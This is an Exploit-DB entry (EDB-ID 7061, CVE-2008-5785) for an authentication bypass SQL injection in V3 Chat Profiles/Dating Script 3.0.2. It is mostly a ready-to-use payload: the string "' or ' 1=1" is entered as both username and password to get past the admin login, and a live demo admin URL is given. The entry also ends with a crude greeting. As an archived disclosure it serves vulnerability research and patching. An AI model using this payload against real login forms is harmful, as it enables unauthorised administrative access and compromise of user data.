V3 Chat Profiles/Dating Script 3.0.2 - Auth Bypass SQL Injection Vuln

2008-11-08T00:00:00
ID EDB-ID:7061
Type exploitdb
Reporter d3b4g
Modified 2008-11-08T00:00:00

Description

V3 Chat Profiles/Dating Script 3.0.2 (Auth Bypass) SQL Injection Vuln. CVE-2008-5785. Webapps exploit for php platform

                                        
                                            [~] V3 Chat - Profiles/Dating Script v3.0.2 Auth Bypass Vulnerability
[~]
[~] -----------------------------------------------------------------
[~] Discovered By: d3b4g
[~]
[~] contact: bl4ckend[at]gmail[dot]com  
[~] 
[~] Risk: High

 ---------------------------------------------------------------------

Exploit: USe this information to bypass admin login

username: ' or ' 1=1

password: ' or ' 1=1
-----------------------------------------------------------------------

Demo: http://v3chat.com/v3profiles/admin/



[~]----------------------------------------------------------------------
[~] Greetz tO: All fu3k3rz

# milw0rm.com [2008-11-08]